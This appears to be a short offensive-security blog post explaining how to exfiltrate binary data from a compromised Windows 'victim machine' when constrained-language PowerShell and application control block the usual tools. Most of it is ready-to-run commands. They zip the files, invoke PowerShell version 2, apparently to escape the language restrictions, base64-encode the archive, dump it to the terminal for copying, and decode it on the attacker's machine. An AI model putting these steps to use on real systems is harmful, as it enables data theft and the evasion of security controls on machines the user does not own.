Okay, so you’ve landed in a constrained language PowerShell on a remote box, and the local application security policy is stopping you from using all the regular stuff (e.g. netcat, opening network connections, etc)… but you need to exfil a medium amount of binary data. How would you do that?
The following isn’t perfect, but it’s the solution I used recently… feel free to share better solutions! 🙂
On the victim machine
First create a ZIP file to contain all of the content. For this I’m assuming that you’re in a location where you can write to.
PS> Compress-Archive -Path .\* -DestinationPath .\FILENAME.ZIP
Now convert it to base64 and spit it into a file. Note: I’m just doing this because sometimes data is lost, and I don’t want to redo things over and over again. If you’d prefer you can just spit the content out directly.
PS> powershell -version 2 -command '$Content = Get-Content -Path .\FILENAME.ZIP -Encoding Byte; $Base64 = [System.Convert]::ToBase64String($Content); $Base64 | Out-File .\B64FILENAME'
Now type it out and copy it.
PS> type .\B64FILENAME
On your machine
First up, create a new file (B64FILENAME) and paste all of that base64 into it.
PS> $SOURCEFILE = "B64FILENAME"; [System.Convert]::FromBase64String((Get-Content $SOURCEFILE)) | Set-Content FILENAME.ZIP -Encoding Byte
Optionally, expand it in PowerShell as well
PS> Expand-Archive -Path .\FILENAME.ZIP